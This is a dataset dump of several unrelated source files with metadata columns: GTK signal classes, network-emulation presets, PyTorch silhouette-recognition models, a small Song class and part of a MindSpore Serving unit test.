| 0.071873
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009174
| 0
| 0.009174
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2cadb51165109f752686ebf5d262e8c249fe2c27
| 1,825
|
py
|
Python
|
gtk_modules/signals.py
|
henrikmidtiby/gtk_modules
|
00e321b6b50ce2b9b31e08065b893752f1b2247c
|
[
"BSD-3-Clause"
] | null | null | null |
gtk_modules/signals.py
|
henrikmidtiby/gtk_modules
|
00e321b6b50ce2b9b31e08065b893752f1b2247c
|
[
"BSD-3-Clause"
] | null | null | null |
gtk_modules/signals.py
|
henrikmidtiby/gtk_modules
|
00e321b6b50ce2b9b31e08065b893752f1b2247c
|
[
"BSD-3-Clause"
] | null | null | null |
from gi.repository import GObject
class DrawSignals(GObject.GObject):
    """GObject signal hub for draw events: video frames, images, points,
    lines and boxes.

    The ``*_live`` variants carry seven floats -- presumably the
    in-progress coordinates/state while the user is still dragging;
    TODO confirm against the emitting widgets.
    """

    __gsignals__ = {'video_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT)),
                    'image_draw': (GObject.SIGNAL_RUN_LAST, None, (str,)),
                    'point_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT,)),
                    'line_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT,)),
                    'line_draw_live': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float, float, float, float)),
                    'box_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT,)),
                    'box_draw_live': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float, float, float, float))}

    def __init__(self):
        super().__init__()
class MouseSignals(GObject.GObject):
    """GObject signal hub for mouse events, one press/release/move
    triple per button (left, right, middle).

    Press signals carry four floats while release/move carry two --
    presumably (x, y) plus extra press context; TODO confirm against
    the emitting widgets.
    """

    __gsignals__ = {'left_mouse_press': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float)),
                    'left_mouse_release': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
                    'left_mouse_move': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
                    'right_mouse_press': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float)),
                    'right_mouse_release': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
                    'right_mouse_move': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
                    'middle_mouse_press': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float)),
                    'middle_mouse_release': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
                    'middle_mouse_move': (GObject.SIGNAL_RUN_LAST, None, (float, float))}

    def __init__(self):
        super().__init__()
| 60.833333
| 160
| 0.629589
| 208
| 1,825
| 5.091346
| 0.168269
| 0.254958
| 0.241737
| 0.302172
| 0.855524
| 0.855524
| 0.829084
| 0.791313
| 0.791313
| 0.375826
| 0
| 0
| 0.235616
| 1,825
| 29
| 161
| 62.931034
| 0.75914
| 0
| 0
| 0.173913
| 0
| 0
| 0.126027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.304348
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2cc7eb2a5abe5414746c476f88721bd596bda843
| 165
|
py
|
Python
|
dazu/typing/__init__.py
|
ralphg6/david
|
064a7fd91961bdf372868e7b0a106102e9fc058b
|
[
"Apache-2.0"
] | 2
|
2020-01-07T01:15:49.000Z
|
2020-02-21T00:48:49.000Z
|
dazu/typing/__init__.py
|
Dazu-io/dazu
|
064a7fd91961bdf372868e7b0a106102e9fc058b
|
[
"Apache-2.0"
] | 41
|
2020-01-20T22:30:08.000Z
|
2020-02-21T19:46:52.000Z
|
dazu/typing/__init__.py
|
Dazu-io/dazu
|
064a7fd91961bdf372868e7b0a106102e9fc058b
|
[
"Apache-2.0"
] | 3
|
2019-03-15T17:56:04.000Z
|
2020-01-17T20:29:37.000Z
|
from dazu.typing.message import Message
from dazu.typing.model import Model
from dazu.typing.module import Module
from dazu.typing.training_data import TrainingData
| 33
| 50
| 0.854545
| 25
| 165
| 5.6
| 0.4
| 0.228571
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09697
| 165
| 4
| 51
| 41.25
| 0.939597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
39521d38d119ed7170f019b01c7d9db1f11ce54c
| 6,040
|
py
|
Python
|
mnemu/mnemu_presets.py
|
Corefracture/mnemu
|
dcbb0645966d0aea710f1755ba2dab88cd33e647
|
[
"MIT"
] | 4
|
2018-10-10T08:10:49.000Z
|
2020-08-05T22:09:15.000Z
|
mnemu/mnemu_presets.py
|
Corefracture/mnemu
|
dcbb0645966d0aea710f1755ba2dab88cd33e647
|
[
"MIT"
] | 1
|
2018-09-11T16:08:13.000Z
|
2018-09-11T16:09:11.000Z
|
mnemu/mnemu_presets.py
|
Corefracture/mnemu
|
dcbb0645966d0aea710f1755ba2dab88cd33e647
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2018 Corefracture, Chris Coleman.
# www.corefracture.com - @corefracture
#
# Licensed under the MIT License, https://opensource.org/licenses/MIT
# See LICENSE.md for more details
from mnemu import netem_defs as NetEm
class MNemuPresets:
    """Built-in NetEm presets, held as separate download and upload sets.

    Each preset is an id -> display-name entry plus an id ->
    NetemSettings entry (bandwidth in kbit, optional latency in ms and
    loss in %).

    Bug fixed: in the original tables both "Mobile 3G" and
    "Mobile 3G - High Latency" used the id "3G", so the high-latency
    entry silently overwrote the plain 3G preset in both directions.
    The high-latency preset now has its own id, "3GHighLat".
    """

    def __init__(self):
        self._preset_download_names = {}
        self._preset_download_data = {}
        self._preset_upload_names = {}
        self._preset_upload_data = {}
        self._add_hardcoded_presets(self._preset_download_names, self._preset_download_data)
        self._add_hardcoded_upload_presets(self._preset_upload_names, self._preset_upload_data)

    def get_preset_names(self, upload=False):
        """Return the id -> display-name map for the requested direction."""
        return self._preset_upload_names if upload else self._preset_download_names

    def get_preset(self, preset_id, upload=False):
        """Return the NetemSettings for *preset_id*, or None if unknown."""
        data = self._preset_upload_data if upload else self._preset_download_data
        return data.get(preset_id)

    @staticmethod
    def _add_preset(names, data, preset_id, display_name, bandwidth, latency=None, loss=None):
        """Register one preset; latency/loss are passed to netem as strings."""
        settings = NetEm.NetemSettings()
        settings.set_bandwidth(bandwidth)
        if latency is not None:
            settings.netem_setting(NetEm.NetemType.LATENCY, latency)
        if loss is not None:
            settings.netem_setting(NetEm.NetemType.LOSS, loss)
        names[preset_id] = display_name
        data[preset_id] = settings

    def _add_hardcoded_presets(self, names, data):
        """Populate the download-direction preset tables."""
        add = self._add_preset
        add(names, data, "Full", "Regular Network", 100000)
        add(names, data, "MobileTerrible", "Terrible Mobile", 640, "175", "1.50")
        add(names, data, "2G", "Mobile 2G", 256, "75", "0.50")
        add(names, data, "3G", "Mobile 3G", 1500, "75", "0.15")
        add(names, data, "3GLow", "Mobile 3G - Low Signal", 700, "100", "0.50")
        # Originally also registered under "3G", clobbering the entry above.
        add(names, data, "3GHighLat", "Mobile 3G - High Latency", 1500, "150", "0.25")
        add(names, data, "4G", "Mobile 4G - Low End", 35000, "10", "0.01")

    def _add_hardcoded_upload_presets(self, names, data):
        """Populate the upload-direction preset tables."""
        add = self._add_preset
        add(names, data, "Full", "Regular Network", 100000)
        add(names, data, "MobileTerrible", "Terrible Mobile", 256, "200", "1.50")
        add(names, data, "2G", "Mobile 2G", 75, "75", "0.25")
        add(names, data, "3G", "Mobile 3G", 768, "50", "0.15")
        add(names, data, "3GLow", "Mobile 3G - Low Signal", 650, "100", "0.75")
        # Originally also registered under "3G", clobbering the entry above.
        add(names, data, "3GHighLat", "Mobile 3G - High Latency", 768, "150", "0.50")
        add(names, data, "4G", "Mobile 4G - Low End", 25000, "10", "0.01")
| 35.321637
| 95
| 0.641225
| 718
| 6,040
| 5.125348
| 0.130919
| 0.197283
| 0.165217
| 0.15
| 0.855163
| 0.843478
| 0.843478
| 0.830978
| 0.809783
| 0.783152
| 0
| 0.034397
| 0.263576
| 6,040
| 170
| 96
| 35.529412
| 0.792941
| 0.056291
| 0
| 0.769231
| 0
| 0
| 0.064437
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.007692
| 0
| 0.084615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46c521bb66a4d7c4687f3162ec2f8498124dd995
| 9,552
|
py
|
Python
|
models/model.py
|
zihaomu/HID_2020_baseline
|
c2c3705707695a969d24aa52c225aa3f85c7a4f3
|
[
"Apache-2.0"
] | 34
|
2020-08-26T14:53:13.000Z
|
2021-09-26T12:41:55.000Z
|
models/model.py
|
zihaomu/HID_2020_baseline
|
c2c3705707695a969d24aa52c225aa3f85c7a4f3
|
[
"Apache-2.0"
] | 1
|
2020-10-10T14:29:25.000Z
|
2020-10-10T19:28:03.000Z
|
models/model.py
|
zihaomu/HID_2020_baseline
|
c2c3705707695a969d24aa52c225aa3f85c7a4f3
|
[
"Apache-2.0"
] | 7
|
2020-09-06T06:49:45.000Z
|
2022-03-11T11:13:39.000Z
|
import torch
import torch.nn as nn
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
    """3x3 convolution with padding"""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        # Padding equals the dilation so the spatial size is preserved
        # at stride 1.
        padding=dilation,
        groups=groups,
        dilation=dilation,
        bias=False,
    )
def conv1x1(in_planes, out_planes, stride=1):
    """1x1 convolution"""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=1,
        stride=stride,
        bias=False,
    )
class BasicBlock(nn.Module):
    """ResNet basic block: two 3x3 conv/BN stages with ReLU and an
    identity (or downsampled) residual connection."""

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Project the shortcut when a downsample module is configured,
        # otherwise use the input as-is.
        identity = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out += identity
        return self.relu(out)
class Bottleneck(nn.Module):
    """ResNet bottleneck residual block: 1x1 reduce, 3x3, 1x1 expand, with a
    skip connection. Output channels are `planes * expansion` (4x)."""

    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        """Build the block.

        Args:
            inplanes: input channel count.
            planes: bottleneck (reduced) channel count; output is 4 * planes.
            stride: stride of the middle 3x3 convolution.
            downsample: optional module applied to the input so the skip
                connection matches the main path's shape.
        """
        super().__init__()
        width = planes
        self.conv1 = nn.Conv2d(inplanes, width, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(width)
        self.conv2 = nn.Conv2d(width, width, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(width)
        self.conv3 = nn.Conv2d(width, width * self.expansion, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(width * self.expansion)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        """1x1 reduce, 3x3, 1x1 expand; add skip; final relu."""
        identity = x if self.downsample is None else self.downsample(x)
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.relu(self.bn2(self.conv2(y)))
        y = self.bn3(self.conv3(y))
        y += identity
        return self.relu(y)
class YouOwnModel(nn.Module):
    # set you own model structure here.
    # NOTE(review): this is an unimplemented placeholder. Both methods are
    # `pass`, so `nn.Module.__init__` is never called and instantiating this
    # class will not produce a usable module; when filling it in, call
    # `super().__init__()` first. Constructor arguments mirror
    # SilhouetteDeep/SilhouetteNormal below.
    def __init__(self, feature_dimension=512, block=Bottleneck, num_classes=500):
        # Stub: no layers are built yet.
        pass

    def forward(self, silho):
        # Stub: returns None until implemented.
        pass
class SilhouetteDeep(nn.Module):
    """Deeper per-frame silhouette classifier.

    Each frame of the input sequence is passed through a small ResNet-style
    backbone (single-channel input), per-frame embeddings are averaged over
    the sequence, and the mean embedding is classified.

    Fixes relative to the original:
      * `self.layer4` was applied twice in a row in `forward` (copy/paste
        duplication; the sibling SilhouetteNormal applies each layer once).
      * per-frame debug `print`s removed from `forward`.
      * the local `input` no longer shadows the builtin.
      * per-frame embeddings are collected in a list and concatenated once
        instead of `torch.cat` inside the loop (same values, no quadratic
        re-copying).
    """

    def __init__(self, feature_dimension=512, block=Bottleneck, num_classes=86):
        """Build the network.

        Args:
            feature_dimension: size of the per-sequence embedding.
            block: kept for signature compatibility; the layer structure below
                is hard-wired and does not use it.
            num_classes: number of output classes.
        """
        print("num_classes:", num_classes)
        self.inplanes = 64
        super(SilhouetteDeep, self).__init__()
        # Stem: two 3x3 convs on the 1-channel silhouette, two 2x2 max-pools.
        self.conv1 = nn.Sequential(
            conv3x3(1, 64),
            nn.BatchNorm2d(64),
            conv3x3(64, 64),
            nn.BatchNorm2d(64),
            nn.MaxPool2d(2, 2),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
        )
        self.layer1 = BasicBlock(64, 64)
        self.conv2 = nn.Sequential(conv3x3(64, 128), nn.MaxPool2d(2, 2))
        self.layer2 = nn.Sequential(BasicBlock(128, 128), BasicBlock(128, 128))
        self.conv3 = nn.Sequential(conv3x3(128, 256), nn.MaxPool2d(2, 2))
        self.layer3 = nn.Sequential(Bottleneck(256, 64),
                                    Bottleneck(256, 64),
                                    Bottleneck(256, 64))
        self.conv4 = nn.Sequential(conv3x3(256, 512), nn.MaxPool2d(2, 2))
        self.layer4 = nn.Sequential(Bottleneck(512, 128),
                                    Bottleneck(512, 128),
                                    Bottleneck(512, 128))
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(512, feature_dimension)
        self.out = nn.Linear(feature_dimension, num_classes)
        # Standard ResNet-style weight initialization.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)

    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack `blocks` residual blocks, downsampling the skip path when the
        first block changes resolution or channel count.

        NOTE(review): currently unused by __init__ (the layers above are
        constructed explicitly); kept for compatibility.
        """
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)

    def forward(self, silho):
        """Run the backbone on each frame and classify the mean embedding.

        Args:
            silho: tensor indexed as silho[:, i, :, :] per frame — assumed
                (batch, frames, height, width); TODO confirm with callers.

        Returns:
            (fc, out): mean per-sequence embedding and class logits.
        """
        n = silho.size(1)  # number of frames in the sequence
        per_frame = []
        for i in range(n):
            frame = silho[:, i, :, :].unsqueeze(1)  # add channel dim -> (B,1,H,W)
            x = self.conv1(frame)
            x = self.layer1(x)
            x = self.conv2(x)
            x = self.layer2(x)
            x = self.conv3(x)
            x = self.layer3(x)
            x = self.conv4(x)
            # BUG FIX: layer4 was applied twice here in the original.
            x = self.layer4(x)
            x = self.avgpool(x)
            x = x.view(x.size(0), -1)
            x = self.fc(x)
            per_frame.append(x.unsqueeze(1))
        out = torch.cat(per_frame, 1)      # (B, n, feature_dimension)
        fc = torch.mean(out, 1)            # average over frames
        out = self.out(fc)                 # class logits
        return fc, out
class SilhouetteNormal(nn.Module):
    """Per-frame silhouette classifier (shallower sibling of SilhouetteDeep).

    Every frame of the input sequence goes through a small ResNet-style
    backbone; the per-frame embeddings are averaged over the sequence and the
    mean embedding is classified. Returns (embedding, logits).
    """

    def __init__(self, feature_dimension=512, block=Bottleneck, num_classes=86):
        """Build the network.

        Args:
            feature_dimension: size of the per-sequence embedding.
            block: kept for signature compatibility; the layers below are
                hard-wired and do not use it.
            num_classes: number of output classes.
        """
        print("num_classes:", num_classes)
        self.inplanes = 64
        super(SilhouetteNormal, self).__init__()
        # Stem: two 3x3 convs on the 1-channel input plus two 2x2 max-pools.
        self.conv1 = nn.Sequential(
            conv3x3(1, 64),
            nn.BatchNorm2d(64),
            conv3x3(64, 64),
            nn.BatchNorm2d(64),
            nn.MaxPool2d(2, 2),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
        )
        self.layer1 = BasicBlock(64, 64)
        self.conv2 = nn.Sequential(conv3x3(64, 128), nn.MaxPool2d(2, 2))
        self.layer2 = nn.Sequential(BasicBlock(128, 128))
        self.conv3 = nn.Sequential(conv3x3(128, 256), nn.MaxPool2d(2, 2))
        self.layer3 = nn.Sequential(Bottleneck(256, 64))
        self.conv4 = nn.Sequential(conv3x3(256, 512), nn.MaxPool2d(2, 2))
        self.layer4 = nn.Sequential(Bottleneck(512, 128))
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(512, feature_dimension)
        self.out = nn.Linear(feature_dimension, num_classes)
        # ResNet-style initialization for convs and batch norms.
        for module in self.modules():
            if isinstance(module, nn.Conv2d):
                nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(module, nn.BatchNorm2d):
                nn.init.constant_(module.weight, 1)
                nn.init.constant_(module.bias, 0)

    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack `blocks` residual blocks; the first may downsample the skip
        path when resolution or channel count changes.

        NOTE(review): not called by __init__ above; kept for compatibility.
        """
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        stages = [block(self.inplanes, planes, stride, downsample)]
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            stages.append(block(self.inplanes, planes))
        return nn.Sequential(*stages)

    def forward(self, silho):
        """Run the backbone per frame, average the embeddings, classify.

        Args:
            silho: tensor indexed as silho[:, i, :, :] per frame — assumed
                (batch, frames, height, width); TODO confirm with callers.

        Returns:
            (fc, out): mean embedding and class logits.
        """
        n = silho.size(1)  # batch
        per_frame = []
        for idx in range(n):
            frame = silho[:, idx, :, :].unsqueeze(1)
            x = self.conv1(frame)
            x = self.layer1(x)
            x = self.conv2(x)
            x = self.layer2(x)
            x = self.conv3(x)
            x = self.layer3(x)
            x = self.conv4(x)
            x = self.layer4(x)
            x = self.avgpool(x)
            x = x.view(x.size(0), -1)
            per_frame.append(self.fc(x).unsqueeze(1))
        stacked = torch.cat(per_frame, 1)
        fc = torch.mean(stacked, 1)
        return fc, self.out(fc)
if __name__ == "__main__":
    # Smoke test: build the default model and print its layer structure.
    model = SilhouetteNormal()
    print(model)
| 34.483755
| 91
| 0.505025
| 1,052
| 9,552
| 4.499049
| 0.115019
| 0.022185
| 0.019015
| 0.021973
| 0.860765
| 0.85675
| 0.807099
| 0.774773
| 0.774773
| 0.757448
| 0
| 0.057138
| 0.382538
| 9,552
| 277
| 92
| 34.483755
| 0.745337
| 0.008794
| 0
| 0.776744
| 0
| 0
| 0.007516
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065116
| false
| 0.009302
| 0.009302
| 0
| 0.144186
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46d1f0370f1391b529beed0b77d550d4063ad7a1
| 212
|
py
|
Python
|
defining_classes_exercise/spoopify_08/project/song.py
|
B3WD/SU-python-oop
|
1df32e57cb095b2e6cdab1211c19ba340c434874
|
[
"MIT"
] | null | null | null |
defining_classes_exercise/spoopify_08/project/song.py
|
B3WD/SU-python-oop
|
1df32e57cb095b2e6cdab1211c19ba340c434874
|
[
"MIT"
] | null | null | null |
defining_classes_exercise/spoopify_08/project/song.py
|
B3WD/SU-python-oop
|
1df32e57cb095b2e6cdab1211c19ba340c434874
|
[
"MIT"
] | null | null | null |
class Song:
    """A song with a name, a length, and a single-release flag."""

    # NOTE(review): "lenght" is a typo for "length", but it is part of the
    # public constructor signature, so it is preserved for compatibility.
    def __init__(self, name, lenght, single):
        self.name = name
        self.lenght = lenght
        self.single = single

    def get_info(self):
        """Return the song description as "<name> - <length>"."""
        return "{} - {}".format(self.name, self.lenght)
| 23.555556
| 45
| 0.584906
| 27
| 212
| 4.407407
| 0.444444
| 0.201681
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29717
| 212
| 9
| 46
| 23.555556
| 0.798658
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
200965efe6fb9e7612929b73f7436f36fa39354c
| 72
|
py
|
Python
|
portality/bll/__init__.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 47
|
2015-04-24T13:13:39.000Z
|
2022-03-06T03:22:42.000Z
|
portality/bll/__init__.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 1,215
|
2015-01-02T14:29:38.000Z
|
2022-03-28T14:19:13.000Z
|
portality/bll/__init__.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 14
|
2015-11-27T13:01:23.000Z
|
2021-05-21T07:57:23.000Z
|
from portality.bll.doaj import DOAJ
from portality.bll import exceptions
| 36
| 36
| 0.861111
| 11
| 72
| 5.636364
| 0.545455
| 0.419355
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097222
| 72
| 2
| 36
| 36
| 0.953846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
647650d417e61aa879830e2f4b45c46a81669a26
| 49,684
|
py
|
Python
|
tests/ut/python/tests/test_stage_function.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 157
|
2020-12-10T09:42:48.000Z
|
2021-12-02T09:27:48.000Z
|
tests/ut/python/tests/test_stage_function.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 1
|
2021-12-08T11:39:59.000Z
|
2022-01-17T09:09:54.000Z
|
tests/ut/python/tests/test_stage_function.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
from common import serving_test, create_client
from common import start_serving_server
def is_float_equal(left, right):
    """Return True when `left` and `right` are elementwise equal within an
    absolute tolerance of 1e-5."""
    difference = np.absolute(left - right)
    return (difference < 1e-5).all()
@serving_test
def test_stage_function_one_function_stage_float_success():
    """
    Feature: test servable_config.py stage
    Description: Test stage with two inputs, one output
    Expectation: Serving server work ok.
    """
    # Servable config deployed to the server: one python-function stage that
    # adds its two inputs elementwise.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def test_concat(x1, x2):
    return x1 + x2
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(test_concat, x1, x2, outputs_count=1)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    x1s = []
    x2s = []
    x1s.append(np.array([[101.1, 205.2], [41.3, 62.4]], np.float32))
    x2s.append(np.array([[3.5, 5.6], [7.7, 9.8]], np.float32))
    x1s.append(np.array([[41.3, 32.2], [4.1, 3.9]], np.float32))
    x2s.append(np.array([[1.4, 4.5], [9.6, 19.7]], np.float32))
    x1s.append(np.array([[11.1, 21.2], [41.9, 61.8]], np.float32))
    x2s.append(np.array([[31.5, 51.7], [71.4, 91.3]], np.float32))
    for i in range(3):
        instances.append({"x1": x1s[i], "x2": x2s[i]})
        y = x1s[i] + x2s[i]
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Each returned y must equal the client-side x1 + x2.
    assert (result[0]["y"] == ys[0]).all()
    assert (result[1]["y"] == ys[1]).all()
    assert (result[2]["y"] == ys[2]).all()
@serving_test
def test_stage_function_one_function_stage_two_output_success():
    """
    Feature: test servable_config.py stage
    Description: Test stage with one input, two outputs
    Expectation: Serving server work ok.
    """
    # Stage function returns two outputs (x1 + 1, x1 - 1) from one input.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def test_concat(x1):
    return x1 + 1, x1-1
@register.register_method(output_names=["y1", "y2"])
def predict(x1):
    y1, y2 = register.add_stage(test_concat, x1, outputs_count=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    y1s = []
    y2s = []
    x1s = []
    x1s.append(np.array([[101.1, 205.2], [41.3, 62.4]], np.float32))
    x1s.append(np.array([[41.3, 32.2], [4.1, 3.9]], np.float32))
    x1s.append(np.array([[11.1, 21.2], [41.9, 61.8]], np.float32))
    for i in range(3):
        instances.append({"x1": x1s[i]})
        y1s.append(x1s[i] + 1)
        y2s.append(x1s[i] - 1)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # y1 = x1 + 1 and y2 = x1 - 1 for every instance.
    assert (result[0]["y1"] == y1s[0]).all()
    assert (result[1]["y1"] == y1s[1]).all()
    assert (result[2]["y1"] == y1s[2]).all()
    assert (result[0]["y2"] == y2s[0]).all()
    assert (result[1]["y2"] == y2s[1]).all()
    assert (result[2]["y2"] == y2s[2]).all()
@serving_test
def test_stage_function_one_function_stage_output_more_failed():
    """
    Feature: test servable_config.py stage
    Description: Test stage declared outputs_count < python function outputs count
    Expectation: Serving server report error.
    """
    # func_test returns 3 values while the stage declares outputs_count=2.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    return x1+x2, x1-x2, 1
